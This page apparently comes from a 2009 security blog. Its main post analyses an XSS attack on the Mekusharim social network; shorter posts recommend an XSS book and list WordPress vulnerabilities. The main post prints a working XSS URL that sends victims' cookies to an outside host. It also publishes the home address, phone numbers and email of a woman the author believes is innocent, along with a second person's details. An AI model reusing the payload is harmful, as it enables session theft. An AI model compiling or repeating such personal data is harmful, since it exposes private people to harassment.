Recognize-Security » Web Application Security

The Case of a TinyURL in Mekusharim

Trancer — Thu, 30 Apr 2009 13:19:29 +0000

First of all, if you don’t know what Mekusharim is, here’s a little introduction:
Mekusharim is an Israeli social network founded in 2005 by three ambitious guys and currently have more then 1 million registered users. It’s very similar to any standard social network, it have users profile pages, albums, videos, mailing system and articles, pools and forums sections.
Recently Walla! acquired additional 36 percent of Mekusharim in 4.5 million NIS (out of 12.5 million NIS value assessment), giving Walla! a total of 70 percent share holding of Mekusharim.
I’ve had the pleasure of working with the Mekusharim guys on various security issues since 2006, mostly on finding and help fixing web application vulnerabilities.
Like most of the social networks out there, Mekusharim is a great platform for attackers to spread their malware and reach a high amount of users in a short period of time, take Samy of MySpace for example.
The first time I contacted Mekusharim was right after I wrote a proof-of-concept web worm that can spread through the site, infecting users profile pages and stealing user cookies. It was written in two lines of JavaScript code and exploit a Cross-Site Scripting and a Cross-Site Request Forgery vulnerabilities.
But that’s water under the bridge, Mekusharim have switched several systems (PHP -> ASP -> ASP.NET) and is much more secure nowadays. And if someone will try hacking it, I’ll be after the poor bastard :-)

Which brings us to the main subject of this post. Few days ago I got a mail message in Mekusharim from a friend user, that looks like this:

Click to enlarge.

As you can see, the message subject is “:)” and the message body contains a TinyURL link.
Something smells fishy here… Previewing the link will discover that this is definitely a XSS attack:

Click to enlarge.

The TinyURL link redirects to:
http://www.mekusharim.co.il/forums/ForumsList.aspx?Display=1&TagName='\';x=new%20Image();x.src="http://oritor.co.il/cgi-bin/mekusharim.php?cookie="%2Bdocument.cookie;//

Click to enlarge.

The URL exploits a XSS vulnerability in the forums system (ForumsList.aspx page, TagName parameter), sending the user cookie to the attacker pre-made page located at oritor.co.il/cgi-bin/mekusharim.php.

The first thing that crossed my mind is getting some information on oritor.co.il domain and his owner. Running a quick whois on the domain reveals a lot of useful information:
domain: oritor.co.il descr: orit bokobza descr: ezra 20 descr: rishon leztion descr: 75515 descr: Israel phone: +972 50 8836620 e-mail: orit123 AT bezeqint.net admin-c: LD-OB3906-IL tech-c: LD-OB3906-IL zone-c: LD-OB3906-IL nserver: ns1.xoox.co.il nserver: ns2.xoox.co.il validity: 16-12-2009 status: Transfer Locked changed: domain-registrar AT isoc.org.il 20081216 (Assigned) person: orit bokobza address: ezra 20 address: rishon leztion address: 75515 address: Israel phone: +972 50 8836620 e-mail: orit123 AT bezeqint.net nic-hdl: LD-OB3906-IL changed: domain-registrar AT isoc.org.il 20081216 registrar name: LiveDns Ltd Registrar info: http://domains.livedns.co.il % Rights to the data above are restricted by copyright.

The domain oritor.co.il is registered to Orit Bokobza from Ezra 20 street, Rishon Leztion. Orit cellular phone number is 0508836620 (Pelephone) and she registered the domain using her ISP email address, which reveal that she’s registered to Bezeq International ISP under the username orit123. We also see that the site DNS is registered to xoox.co.il NS servers, we’ll get to that later.
Digging deeper using b144.co.il, searching Orit Bokobza from Rishon Leztion gives one identical match (same address and house number), reveal she have another cellular phone number – 0545455382 (Orange):

Click to enlarge.

b144 also gives us a map to the house and a picture of the house itself:

Click to enlarge.

Cool.
Digging further, Googling her email address and retrieving additional information from her web site and posts from forums she’s active in reveals that she’s some kind of personal holistic trainer and has master in energetic healing.
At this point I’m quite sure that she’s got nothing to do with this XSS attack on Mekusharim but it’s a good place to start investigating and tracking down the attacker. My guess is that her site is being used by the attacker who compromised the hosting server.
Let’s take a look at what web sites is hosted on the same server using Live Search ip: search feature:
http://search.live.com/results.aspx?q=ip:91.198.129.47

We see that this hosting server also host xoox.co.il which is the same oritor.co.il site DNS provider as resolved from the whois. Something tells me the holistic master got no technical skills at all so xoox.co.il administrator will be a better person to talk to and get additional information about the XSS attack.
Running whois on xoox.co.il:
domain: xoox.co.il descr: Shlomi Rabia descr: Agibor Almoni 13 descr: Tel Aviv descr: 67421 descr: Israel phone: +972 50 7809313 e-mail: xoox AT bezeqint.net admin-c: II-SR5955-IL tech-c: II-SR5955-IL zone-c: II-SR5955-IL nserver: ns1.xoox.co.il nserver: ns10.rehost.co.il validity: 14-10-2010 status: Transfer Allowed changed: domain-registrar AT isoc.org.il 20041014 (Assigned) changed: domain-registrar AT isoc.org.il 20041017 (Changed) changed: domain-registrar AT isoc.org.il 20041229 (Changed) changed: domain-registrar AT isoc.org.il 20070510 (Changed) changed: domain-registrar AT isoc.org.il 20070805 (Changed) changed: domain-registrar AT isoc.org.il 20070809 (Changed) changed: domain-registrar AT isoc.org.il 20080731 (Changed) changed: domain-registrar AT isoc.org.il 20080731 (Changed) changed: domain-registrar AT isoc.org.il 20080804 (Changed) changed: domain-registrar AT isoc.org.il 20081026 (Changed) person: Shlomi Rabia address: Agibor Almoni 13 address: Tel Aviv address: 67421 address: Israel e-mail: xoox AT bezeqint.net nic-hdl: II-SR5955-IL changed: domain-registrar AT isoc.org.il 20041014 registrar name: Israel Internet Association ISOC-IL Registrar info: www.isoc.org.il % Rights to the data above are restricted by copyright.

This provide enough information for the right person to contact and conduct further investigation.

I gave all this information to the Mekusharim guys few hours after the attack started, hope this is enough information they need to stop the attack as soon as possible. Meanwhile, the XSS vulnerability got fixed.

XSS Book

Trancer — Fri, 27 Apr 2007 10:56:53 +0000

I guess you all know Cross-Site Scripting attacks are becoming more and more dangerous every day. In the Web 2.0 era, stealing a user cookie\session or hijacking a user browser is almost equal to compromising his box by exploiting a remote code execution vulnerability.
Computer experts say that in the not so far future, operating systems will be no more then just a web browser, all the applications a user need will be online (take Office Online and Google Docs & Spreadsheets for example). Therefor the phrase “XSS is the New Buffer Overflow, JavaScript Malware is the New Shell Code” is true, no wonder XSS made it the number one attack vector of 2006.
So it’s about time someone will publish an XSS book.
XSS Attacks – Cross Site Scripting Attacks Exploits and Defense written by Jeremiah Grossman, Robert Hansen (RSnake), Petko D. Petkov (pdp), Anton Rager and Seth Fogie, is the first book ever made that is dedicated entirely to Cross-Site Scripting.
From what we can see in the preview (Chapter 5 and the Table of Contents), this book is packed with a lot of attack techniques, covers the simplest attack to the most advanced, universal cross-site scripting attacks, XSS exploitation frameworks and a lot more. Worth grabbing a copy :-)

For further information check out the book announcements in Jeremiah’s, RSnake’s and pdp’s blogs.

Reflections on Web Application Security experts

Trancer — Wed, 11 Apr 2007 12:10:43 +0000

Anurag Agarwal is posting on his blog reflections on Web Application Security experts.
He did a great job collecting a lot of material on each one of them. These guys are the best in their field and we all can learn from them.
Worth taking a look:

What’s up with Wordpress security?

Trancer — Tue, 27 Mar 2007 12:45:45 +0000

The last few months has been rough for Wordpress programmers, from a security point of view.
Wordpress is the most common blog\content management system on the internet today and because of that it has become one of the favorite targets for attackers\security researchers.
A quick search will show you how bad the situation is, here, here and here.
Some of the vulnerabilities are really simple, but the most interesting ones are the complex vulnerabilities. the Trackback UTF-7 SQL Injection found by Stefan Esser and the wp-trackback.php Remote SQL Injection found by rgod for example.
If you’re a PHP programmer I suggest you download old versions of Wordpress and look at the vulnerable codes and exploits, I promise you’ll learn a thing or two..
Another spicy piece of news is the backdoored Wordpress systems (v2.1.1) story, occurred earlier this month. that one really made me laugh :D

So what about Wordpress v2.1.2 (latest), secure right? I don’t think so…
Full path disclosure vulnerabilities (by Dedi Dwianto)
Redirection vulnerability in wp-login.php (by Metaeye Security Group)

UPDATE:
xmlrpc.php Remote SQL Injection Vulnerability (exploit) by NotSoSecure
PHP_Self Cross-Site Scripting Vulnerability (exploit) by Alexander Concha and Jungsonn.

Solution: Upgrade to Wordpress 2.1.3.